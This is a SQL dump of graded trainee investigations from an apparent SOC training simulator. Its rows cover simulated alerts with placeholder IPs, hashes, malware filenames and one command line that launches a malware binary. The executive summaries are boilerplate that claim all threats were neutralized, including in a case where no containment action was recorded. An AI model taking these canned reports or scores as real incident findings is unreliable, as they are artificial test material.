(460, 189, 325, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.143.223.91\",\"ip-192.168.1.1\",\"hash-e99a18c4\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:04:04 AM\\nALERT: Malicious Firmware Update Detected [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.143.223.91\\n- [IP] 192.168.1.1\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] firmware_update_v5.3.2.bin\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T03:04:18.391Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:01:58', '2026-03-09 03:04:18', 0, NULL),
(461, 189, 326, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.101\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:05:30 AM\\nALERT: Persistence Mechanism Established [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.101\\n- [HASH] 3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\n- [FILENAME] /dev/mtd0\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: A. MANE\",\"submitted_at\":\"2026-03-09T03:05:43.039Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:04:18', '2026-03-09 03:05:43', 0, NULL),
(462, 189, 327, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.1.1.5\",\"hash-5d41402a\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:06:42 AM\\nALERT: Lateral Movement Detected [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.1.1.5\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [USERNAME] compromised_user\\n- [FILENAME] malicious_payload.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: A. MANE\",\"submitted_at\":\"2026-03-09T03:06:52.676Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:05:43', '2026-03-09 03:06:52', 0, NULL),
(463, 189, 328, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.5.23\",\"ip-203.0.113.45\",\"hash-d41d8cd9\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:08:02 AM\\nALERT: Command and Control Channel Established [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 10.0.5.23\\n- [IP] 203.0.113.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: A. MANE\",\"submitted_at\":\"2026-03-09T03:08:15.658Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:06:52', '2026-03-09 03:08:15', 0, NULL),
(464, 189, 329, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:09:17 AM\\nALERT: Data Exfiltration Attempt Detected [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] confidential_report.pdf\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: A. MANE\",\"submitted_at\":\"2026-03-09T03:09:29.739Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:08:15', '2026-03-09 03:09:29', 0, NULL),
(465, 189, 330, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.5.23\",\"hash-a3f5c3d4\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:10:47 AM\\nALERT: Privilege Escalation Detected [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.5.23\\n- [HASH] a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\n- [USERNAME] john_doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: A. MANE\",\"submitted_at\":\"2026-03-09T03:10:56.034Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:09:29', '2026-03-09 03:11:59', 1, 'issue'),
(466, 189, 331, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-09 03:10:56', '2026-03-09 03:10:56', 0, NULL),
(467, 225, 1443, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-172.217.18.110\",\"ip-10.0.0.15\",\"hash-d41d8cd9\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 2:20:39 PM\\nALERT: Initial Access via Spear Phishing [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 172.217.18.110\\n- [IP] 10.0.0.15\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [EMAIL] j.smith@aerospace-experts.com\\n- [URL] http://compromised-site.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T03:20:49.010Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 06:28:44', '2026-03-09 03:18:44', '2026-03-09 03:20:49', 0, NULL),
(468, 225, 1444, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-3fa8f88c\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 2:22:21 PM\\nALERT: Execution of Custom Mac Malware [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] 3fa8f88c9b1e237e9b6c8e1e4d9e2f7c\\n- [FILENAME] launchProxy\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T03:22:28.803Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:20:49', '2026-03-09 03:22:28', 0, NULL),
(469, 225, 1445, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-10.0.5.12\",\"ip-203.0.113.5\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 2:23:40 PM\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 10.0.5.12\\n- [IP] 203.0.113.5\\n- [USERNAME] jdoe\\n- [HASH] 7e4d2b6e3f8c6b1b9a3c342f5d7a8a3b\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T03:23:46.689Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:22:28', '2026-03-09 03:23:46', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(470, 225, 1456, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.50\",\"hash-d41d8cd9\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:41:48 PM\\nALERT: Suspicious Access to Transaction Switch [OP: Operation FASTCash]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] APT38_tool.bin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:41:53.954Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 08:46:01', '2026-03-09 05:37:01', '2026-03-09 05:41:53', 0, NULL),
(471, 225, 1457, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.123\",\"ip-192.168.10.25\",\"hash-b6a9c8e1\",\"cmd-1\",\"artifact_4\"],\"selectedActions\":[\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:43:00 PM\\nALERT: Malicious Code Execution Detected [OP: Operation FASTCash]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.123\\n- [IP] 192.168.10.25\\n- [HASH] b6a9c8e1d1d7d4a5f1b5c3e2a8f4b9d0\\n- [COMMAND] cmd.exe /c C:\\\\Malware\\\\ATMCodeChanger.exe\\n- [FILENAME] ATMCodeChanger.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:43:01.207Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:41:53', '2026-03-09 05:43:01', 0, NULL),
(472, 225, 1458, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-51.15.123.45\",\"hash-d41d8cd9\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:44:02 PM\\nALERT: Establishing Persistent Access [OP: Operation FASTCash]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 51.15.123.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] svchost.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:44:07.314Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:43:01', '2026-03-09 05:44:07', 0, NULL),
(473, 225, 1459, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"hash-3f4a9d7b\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:45:11 PM\\nALERT: Coordinated Mule Network Activation - Step 4 [OP: Operation FASTCash]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [HASH] 3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\n- [USERNAME] atm_operator\\n- [FILENAME] atm_control.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:45:12.720Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:44:07', '2026-03-09 05:45:12', 0, NULL),
(474, 225, 1460, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.10.45\",\"ip-203.0.113.15\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:46:12 PM\\nALERT: Exfiltration of Stolen Funds [OP: Operation FASTCash]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.10.45\\n- [IP] 203.0.113.15\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] funds_transfer.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:46:18.046Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:45:12', '2026-03-09 05:46:18', 0, NULL),
(475, 225, 1451, 'graded', 88, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/5)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"close_alert\",\"block_hash\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:47:59 PM\\nALERT: Spear-Phishing Email Detected [OP: Operation CryptoCore]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [EMAIL] trustedpartner@example.com\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:48:52.914Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/5)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', '2026-03-09 08:55:02', '2026-03-09 05:47:02', '2026-03-09 05:48:52', 0, NULL),
(476, 225, 1452, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.5\",\"ip-10.0.0.15\",\"hash-f1d2d2f9\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:49:47 PM\\nALERT: Malicious Document Execution [OP: Operation CryptoCore]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.5\\n- [IP] 10.0.0.15\\n- [HASH] f1d2d2f924e986ac86fdf7b36c94bcdf32beec15\\n- [FILENAME] invoice_2023.docx\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:49:52.454Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:48:52', '2026-03-09 05:49:52', 0, NULL),
(477, 225, 1453, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"hash-e99a18c4\",\"artifact_3\"],\"selectedActions\":[\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_hash\",\"isolate_host\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:50:37 PM\\nALERT: Credential Harvesting via Password Manager Exploit [OP: Operation CryptoCore]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] password_manager_exploit_v2.dll\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:50:40.382Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:49:52', '2026-03-09 05:50:40', 0, NULL),
(478, 225, 1454, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.5.3.25\",\"ip-192.168.14.45\",\"ip-203.0.113.15\",\"hash-3f8a5dc7\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:51:34 PM\\nALERT: Lateral Movement Detected [OP: Operation CryptoCore]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 10.5.3.25\\n- [IP] 192.168.14.45\\n- [IP] 203.0.113.15\\n- [HASH] 3f8a5dc7c9b1e9e3e4d6a8b5f1a2c3d4\\n- [USERNAME] jdoe\\n- [FILENAME] malicious_payload.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:51:41.090Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:50:40', '2026-03-09 05:51:41', 0, NULL),
